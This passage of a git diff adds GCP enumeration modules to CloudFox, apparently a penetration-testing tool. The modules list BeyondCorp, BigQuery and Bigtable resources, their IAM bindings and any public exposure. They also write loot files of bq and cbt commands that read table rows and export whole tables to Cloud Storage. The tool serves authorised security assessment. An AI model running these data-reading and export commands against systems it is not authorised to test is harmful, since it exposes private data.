scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go new file mode 100644 index 00000000..3741a5e6 --- /dev/null +++ b/gcp/commands/beyondcorp.go @@ -0,0 +1,262 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + beyondcorpservice "github.com/BishopFox/cloudfox/gcp/services/beyondcorpService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBeyondCorpCommand = &cobra.Command{ + Use: globals.GCP_BEYONDCORP_MODULE_NAME, + Aliases: []string{"bc", "zero-trust"}, + Short: "Enumerate BeyondCorp Enterprise configurations", + Long: `Enumerate BeyondCorp Enterprise configurations. 
+ +Features: +- Lists app connectors and connections +- Analyzes connection endpoints +- Identifies configuration issues`, + Run: runGCPBeyondCorpCommand, +} + +type BeyondCorpModule struct { + gcpinternal.BaseGCPModule + AppConnectors []beyondcorpservice.AppConnectorInfo + AppConnections []beyondcorpservice.AppConnectionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BeyondCorpOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BeyondCorpOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BeyondCorpOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBeyondCorpCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BEYONDCORP_MODULE_NAME) + if err != nil { + return + } + + module := &BeyondCorpModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AppConnectors: []beyondcorpservice.AppConnectorInfo{}, + AppConnections: []beyondcorpservice.AppConnectionInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BEYONDCORP_MODULE_NAME, m.processProject) + + totalCount := len(m.AppConnectors) + len(m.AppConnections) + if totalCount == 0 { + logger.InfoM("No BeyondCorp resources found", globals.GCP_BEYONDCORP_MODULE_NAME) + return + } + + // Count public resources + publicConnectorCount := 0 + publicConnectionCount := 0 + for _, connector := range m.AppConnectors { + if connector.PublicAccess { + publicConnectorCount++ + } + } + for _, conn := range m.AppConnections { + if conn.PublicAccess { + publicConnectionCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d connector(s), %d connection(s)", + len(m.AppConnectors), len(m.AppConnections)), + 
globals.GCP_BEYONDCORP_MODULE_NAME) + + if publicConnectorCount > 0 || publicConnectionCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public connector(s), %d public connection(s)!", + publicConnectorCount, publicConnectionCount), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BeyondCorp in project: %s", projectID), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + svc := beyondcorpservice.New() + + // Get app connectors + connectors, _ := svc.ListAppConnectors(projectID) + m.mu.Lock() + m.AppConnectors = append(m.AppConnectors, connectors...) + m.mu.Unlock() + + // Get app connections + connections, _ := svc.ListAppConnections(projectID) + m.mu.Lock() + m.AppConnections = append(m.AppConnections, connections...) + m.mu.Unlock() + + m.mu.Lock() + for _, conn := range connections { + m.addConnectionToLoot(conn) + } + m.mu.Unlock() +} + +func (m *BeyondCorpModule) initializeLootFiles() { + m.LootMap["beyondcorp-details"] = &internal.LootFile{ + Name: "beyondcorp-details", + Contents: "# BeyondCorp Details\n# Generated by CloudFox\n\n", + } +} + +func (m *BeyondCorpModule) addConnectionToLoot(conn beyondcorpservice.AppConnectionInfo) { + m.LootMap["beyondcorp-details"].Contents += fmt.Sprintf( + "# Connection: %s\n# Endpoint: %s\n# Gateway: %s\n# Connectors: %s\n", + conn.Name, conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) + + if conn.ApplicationEndpoint != "" { + m.LootMap["beyondcorp-details"].Contents += fmt.Sprintf("# Application Endpoint: %s\n", conn.ApplicationEndpoint) + } + m.LootMap["beyondcorp-details"].Contents += "\n" +} + +func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // App Connectors table (one row per IAM 
binding member) + if len(m.AppConnectors) > 0 { + header := []string{"Project Name", "Project ID", "Name", "Location", "State", "Service Account", "Role", "Member", "Public"} + var body [][]string + for _, connector := range m.AppConnectors { + publicAccess := "No" + if connector.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the connector + if len(connector.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.ProjectID, + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range connector.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.ProjectID, + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connectors", + Header: header, + Body: body, + }) + } + + // App Connections table (one row per IAM binding member) + if len(m.AppConnections) > 0 { + header := []string{"Project Name", "Project ID", "Name", "Location", "State", "Endpoint", "Gateway", "Role", "Member", "Public"} + var body [][]string + for _, conn := range m.AppConnections { + publicAccess := "No" + if conn.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the connection + if len(conn.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range conn.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + 
conn.ProjectID, + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connections", + Header: header, + Body: body, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := BeyondCorpOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) + } +} diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 01b67fd7..c5cf3dfc 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -1,134 +1,373 @@ package commands import ( + "context" "fmt" - "time" + "strings" + "sync" BigQueryService "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPBigQueryCommand = &cobra.Command{ - Use: "bigquery", - Aliases: []string{}, - Short: "Display Bigquery datasets and tables information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Bigquery datasets and tables resource information: -cloudfox gcp bigquery`, - Run: runGCPBigQueryCommand, -} + Use: globals.GCP_BIGQUERY_MODULE_NAME, + Aliases: []string{"bq"}, + Short: "Enumerate GCP BigQuery datasets and tables with security analysis", + Long: `Enumerate GCP BigQuery datasets and tables across 
projects with security-focused analysis. -// GCPBigQueryResults struct that implements the internal.OutputInterface -type GCPBigQueryResults struct { - DatasetsData []BigQueryService.BigqueryDataset - TablesData []BigQueryService.BigqueryTable +Features: +- Lists all BigQuery datasets with security-relevant columns +- Shows tables within each dataset with encryption and type info +- Enumerates dataset access control entries (IAM-like) +- Identifies publicly accessible datasets (allUsers/allAuthenticatedUsers) +- Shows encryption status (Google-managed vs CMEK) +- Generates bq commands for data enumeration +- Generates exploitation commands for data access`, + Run: runGCPBigQueryCommand, } -// Define the format for CSV & JSON output -func (g GCPBigQueryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BigQueryModule struct { + gcpinternal.BaseGCPModule - // For Datasets - datasetHeader := []string{"Name", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "Location", "ProjectID"} - var datasetBody [][]string - for _, dataset := range g.DatasetsData { - datasetBody = append(datasetBody, []string{ - dataset.Name, - dataset.DatasetID, - dataset.Description, - dataset.CreationTime.Format(time.RFC3339), - dataset.LastModifiedTime.Format(time.RFC3339), - dataset.Location, - dataset.ProjectID, - }) - } - datasetTableFile := internal.TableFile{ - Header: datasetHeader, - Body: datasetBody, - Name: "bigquery-datasets", - } - tableFiles = append(tableFiles, datasetTableFile) - - // For Tables - tableHeader := []string{"TableID", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "NumBytes", "Location", "ProjectID"} - var tableBody [][]string - for _, table := range g.TablesData { - tableBody = append(tableBody, []string{ - table.TableID, - table.DatasetID, - table.Description, - 
table.CreationTime.Format(time.RFC3339), - table.LastModifiedTime.Format(time.RFC3339), - fmt.Sprintf("%d", table.NumBytes), - table.Location, - table.ProjectID, - }) - } - tableTableFile := internal.TableFile{ - Header: tableHeader, - Body: tableBody, - Name: "bigquery-tables", - } - tableFiles = append(tableFiles, tableTableFile) - - return tableFiles + // Module-specific fields + Datasets []BigQueryService.BigqueryDataset + Tables []BigQueryService.BigqueryTable + LootMap map[string]*internal.LootFile + mu sync.Mutex } -func (g GCPBigQueryResults) LootFiles() []internal.LootFile { - // Implement if there's specific data considered as loot - return []internal.LootFile{} +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BigQueryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } +func (o BigQueryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigQueryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ func runGCPBigQueryCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BIGQUERY_MODULE_NAME) + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGQUERY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &BigQueryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Datasets: []BigQueryService.BigqueryDataset{}, + Tables: []BigQueryService.BigqueryTable{}, + LootMap: 
make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BigQueryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERY_MODULE_NAME, m.processProject) + + // Check results + if len(m.Datasets) == 0 && len(m.Tables) == 0 { + logger.InfoM("No BigQuery datasets found", globals.GCP_BIGQUERY_MODULE_NAME) return } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BIGQUERY_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d dataset(s) with %d table(s)", len(m.Datasets), len(m.Tables)), globals.GCP_BIGQUERY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BigQueryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BigQuery in project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) } + // Create service and fetch data bqService := BigQueryService.New() - var datasetsResults []BigQueryService.BigqueryDataset - var tablesResults []BigQueryService.BigqueryTable - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - 
logger.InfoM(fmt.Sprintf("Retrieving BigQuery datasets and tables from project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) - result, err := bqService.BigqueryDatasetsAndTables(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return + result, err := bqService.BigqueryDatasetsAndTables(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGQUERY_MODULE_NAME, + fmt.Sprintf("Could not enumerate BigQuery in project %s", projectID)) + return + } + + // Thread-safe append + m.mu.Lock() + m.Datasets = append(m.Datasets, result.Datasets...) + m.Tables = append(m.Tables, result.Tables...) + + // Generate loot for each dataset and table + for _, dataset := range result.Datasets { + m.addDatasetToLoot(dataset) + } + for _, table := range result.Tables { + m.addTableToLoot(table) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d dataset(s) and %d table(s) in project %s", len(result.Datasets), len(result.Tables), projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BigQueryModule) initializeLootFiles() { + m.LootMap["bigquery-commands"] = &internal.LootFile{ + Name: "bigquery-commands", + Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *BigQueryModule) addDatasetToLoot(dataset BigQueryService.BigqueryDataset) { + // All commands for this dataset + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "## Dataset: %s (Project: %s, Location: %s)\n"+ + "# Show dataset info\n"+ + "bq show --project_id=%s %s\n"+ + "bq show --format=prettyjson %s:%s\n\n"+ + "# List tables in dataset\n"+ + "bq ls --project_id=%s %s\n\n", + dataset.DatasetID, dataset.ProjectID, dataset.Location, + dataset.ProjectID, dataset.DatasetID, + 
dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + ) +} + +func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { + // Table info and query commands + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "## Table: %s.%s (Project: %s)\n"+ + "# Type: %s, Size: %d bytes, Rows: %d\n"+ + "# Show table schema:\n"+ + "bq show --schema --project_id=%s %s:%s.%s\n"+ + "# Query first 100 rows:\n"+ + "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 100'\n"+ + "# Export table to GCS:\n"+ + "bq extract --project_id=%s '%s:%s.%s' gs:///export_%s_%s.json\n\n", + table.DatasetID, table.TableID, table.ProjectID, + table.TableType, table.NumBytes, table.NumRows, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.DatasetID, table.TableID, + ) + + // Views (may expose data from other datasets) + if table.IsView { + viewQuery := table.ViewQuery + if len(viewQuery) > 200 { + viewQuery = viewQuery[:200] + "..." 
+ } + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "# VIEW DEFINITION: %s.%s\n"+ + "# Legacy SQL: %v\n"+ + "# Query:\n"+ + "# %s\n\n", + table.DatasetID, table.TableID, + table.UseLegacySQL, + strings.ReplaceAll(viewQuery, "\n", "\n# "), + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Dataset table with access columns (one row per access entry) + datasetHeader := []string{ + "Project ID", + "Project Name", + "Dataset ID", + "Location", + "Public", + "Encryption", + "Role", + "Member Type", + "Member", + } + + var datasetBody [][]string + publicCount := 0 + for _, dataset := range m.Datasets { + publicStatus := "" + if dataset.IsPublic { + publicStatus = dataset.PublicAccess + publicCount++ + } + + // One row per access entry + if len(dataset.AccessEntries) > 0 { + for _, entry := range dataset.AccessEntries { + memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) + role := entry.Role + // Special access types (View, Routine, Dataset) may not have explicit roles + if role == "" { + role = "READER" // Views/Routines/Datasets grant implicit read access + } + datasetBody = append(datasetBody, []string{ + dataset.ProjectID, + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + role, + memberType, + entry.Entity, + }) + } + } else { + // Dataset with no access entries + datasetBody = append(datasetBody, []string{ + dataset.ProjectID, + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + "-", + "-", + "-", + }) + } + } + + // Table table with security columns (one row per IAM binding member) + tableHeader := []string{ + "Project ID", + "Project Name", + "Dataset ID", + "Table ID", + "Type", + "Encryption", + "Rows", + "Public", + "Role", + "Member", + } + 
+ var tableBody [][]string + publicTableCount := 0 + for _, table := range m.Tables { + publicStatus := "" + if table.IsPublic { + publicStatus = table.PublicAccess + publicTableCount++ } - datasetsResults = append(datasetsResults, result.Datasets...) - tablesResults = append(tablesResults, result.Tables...) - cloudfoxOutput := GCPBigQueryResults{DatasetsData: datasetsResults, TablesData: tablesResults} + // If no IAM bindings, still show the table + if len(table.IAMBindings) == 0 { + tableBody = append(tableBody, []string{ + table.ProjectID, + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + "-", + "-", + }) + } else { + // One row per member per role + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + tableBody = append(tableBody, []string{ + table.ProjectID, + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + binding.Role, + member, + }) + } + } + } + } - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BIGQUERY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } + + // Build tables list + tables := []internal.TableFile{ + { + Name: "bigquery-datasets", + Header: datasetHeader, + Body: datasetBody, + }, + { + Name: "bigquery-tables", + Header: tableHeader, + Body: tableBody, + }, + 
} + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", publicCount), globals.GCP_BIGQUERY_MODULE_NAME) + } + + output := BigQueryOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGQUERY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go new file mode 100644 index 00000000..0c0bb9e5 --- /dev/null +++ b/gcp/commands/bigtable.go @@ -0,0 +1,287 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigtableservice "github.com/BishopFox/cloudfox/gcp/services/bigtableService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBigtableCommand = &cobra.Command{ + Use: globals.GCP_BIGTABLE_MODULE_NAME, + Aliases: []string{"bt"}, + Short: "Enumerate Cloud Bigtable instances and tables", + Long: `Enumerate Cloud Bigtable instances, clusters, and tables with IAM analysis. 
+ +Features: +- Lists all Bigtable instances with instance-level IAM bindings +- Lists all tables with table-level IAM bindings +- Identifies publicly accessible instances and tables +- Shows cluster information per instance`, + Run: runGCPBigtableCommand, +} + +type BigtableModule struct { + gcpinternal.BaseGCPModule + Instances []bigtableservice.BigtableInstanceInfo + Tables []bigtableservice.BigtableTableInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BigtableOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigtableOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigtableOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigtableCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGTABLE_MODULE_NAME) + if err != nil { + return + } + + module := &BigtableModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []bigtableservice.BigtableInstanceInfo{}, + Tables: []bigtableservice.BigtableTableInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGTABLE_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Bigtable instances found", globals.GCP_BIGTABLE_MODULE_NAME) + return + } + + // Count public instances and tables + publicInstanceCount := 0 + publicTableCount := 0 + for _, instance := range m.Instances { + if instance.PublicAccess { + publicInstanceCount++ + } + } + for _, table := range m.Tables { + if table.PublicAccess { + publicTableCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s) with %d table(s)", + len(m.Instances), len(m.Tables)), globals.GCP_BIGTABLE_MODULE_NAME) + + if publicInstanceCount > 
0 || publicTableCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public instance(s), %d public table(s)!", + publicInstanceCount, publicTableCount), globals.GCP_BIGTABLE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BigtableModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Bigtable in project: %s", projectID), globals.GCP_BIGTABLE_MODULE_NAME) + } + + svc := bigtableservice.New() + result, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Bigtable instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, result.Instances...) + m.Tables = append(m.Tables, result.Tables...) + for _, instance := range result.Instances { + m.addInstanceToLoot(instance) + } + for _, table := range result.Tables { + m.addTableToLoot(table) + } + m.mu.Unlock() +} + +func (m *BigtableModule) initializeLootFiles() { + m.LootMap["bigtable-commands"] = &internal.LootFile{ + Name: "bigtable-commands", + Contents: "# Bigtable Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *BigtableModule) addInstanceToLoot(instance bigtableservice.BigtableInstanceInfo) { + var clusterNames []string + for _, cluster := range instance.Clusters { + clusterNames = append(clusterNames, cluster.Name) + } + + m.LootMap["bigtable-commands"].Contents += fmt.Sprintf( + "# Instance: %s (%s)\n"+ + "# Type: %s, State: %s\n"+ + "# Clusters: %s\n"+ + "cbt -project %s -instance %s ls\n\n", + instance.Name, instance.DisplayName, + instance.Type, instance.State, + strings.Join(clusterNames, ", "), + instance.ProjectID, instance.Name, + ) +} + +func (m *BigtableModule) addTableToLoot(table bigtableservice.BigtableTableInfo) { + m.LootMap["bigtable-commands"].Contents += 
fmt.Sprintf( + "# Table: %s (Instance: %s)\n"+ + "cbt -project %s -instance %s read %s count=10\n\n", + table.Name, table.InstanceName, + table.ProjectID, table.InstanceName, table.Name, + ) +} + +func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Instances table (one row per IAM binding member) + instanceHeader := []string{"Project Name", "Project ID", "Instance", "Display Name", "Type", "State", "Clusters", "Role", "Member", "Public"} + + var instanceBody [][]string + for _, instance := range m.Instances { + publicAccess := "No" + if instance.PublicAccess { + publicAccess = "Yes" + } + + // Build cluster info string: "name (location)" for each cluster + var clusterDetails []string + for _, cluster := range instance.Clusters { + clusterDetails = append(clusterDetails, fmt.Sprintf("%s (%s)", cluster.Name, cluster.Location)) + } + clusters := "-" + if len(clusterDetails) > 0 { + clusters = strings.Join(clusterDetails, ", ") + } + + // If no IAM bindings, still show the instance + if len(instance.IAMBindings) == 0 { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range instance.IAMBindings { + for _, member := range binding.Members { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + if len(instanceBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bigtable-instances", + Header: instanceHeader, + Body: instanceBody, + }) + } + + // Tables table (one row per IAM binding member) + tableHeader := []string{"Project Name", 
"Project ID", "Instance", "Table", "Role", "Member", "Public"} + + var tableBody [][]string + for _, table := range m.Tables { + publicAccess := "No" + if table.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the table + if len(table.IAMBindings) == 0 { + tableBody = append(tableBody, []string{ + m.GetProjectName(table.ProjectID), + table.ProjectID, + table.InstanceName, + table.Name, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + tableBody = append(tableBody, []string{ + m.GetProjectName(table.ProjectID), + table.ProjectID, + table.InstanceName, + table.Name, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + if len(tableBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bigtable-tables", + Header: tableHeader, + Body: tableBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := BigtableOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) +} diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go new file mode 100644 index 00000000..459383e2 --- /dev/null +++ b/gcp/commands/bucketenum.go @@ -0,0 +1,312 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bucketenumservice "github.com/BishopFox/cloudfox/gcp/services/bucketEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + 
